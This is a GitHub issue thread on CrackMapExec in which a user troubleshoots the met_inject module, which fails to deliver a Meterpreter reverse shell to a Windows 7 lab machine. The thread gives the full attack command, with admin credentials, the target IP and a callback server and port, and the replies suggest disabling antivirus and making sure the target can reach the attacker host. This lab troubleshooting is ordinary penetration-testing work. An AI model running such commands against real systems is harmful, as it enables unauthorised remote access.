byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.45k stars 1.64k forks source link

Met_inject Module Fails to inject Meterpreter shell #474

Closed JK-Love closed 1 year ago

JK-Love commented 3 years ago

Steps to reproduce

  1. ...
  2. ...

Command string used

crackmapexec smb 192.168.203.131 -u administrator -p "123" -M met_inject -o SRVHOST=192.168.203.129 SRVPORT=8777 RAND=tQVZLO5RhaPEii7 SSL=http

CME verbose output (using the --verbose flag)

CME Version (cme --version)

Version: 5.1.6dev

OS

Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2021.2 Codename: kali-rolling

Target OS

WIN7 PRO SP1 6.1.7601 Service Pack 1 Build 7601

Detailed issue explanation

image image

image

image

no shell I guarantee that I follow https://github.com/byt3bl33d3r/CrackMapExec/wiki/Using-Modules The steps are done step by step, and I have repeatedly confirmed that there is no problem with the parameters. I looked through all the "Issues" and didn't see any similar questions, so I came to ask questions

I guess the problem is that the same thing as the picture below is missing in the steps I performed The picture below is someone else’s image

mpgn commented 3 years ago

Hello

Check with AV disabled :)

JK-Love commented 3 years ago

There is no antivirus software in the test environment

abid28june commented 2 years ago

make sure your VM IP must be accessible from your target machine, else you would not get any response from the target machine, and as result you wouldn’t get any shell from the machine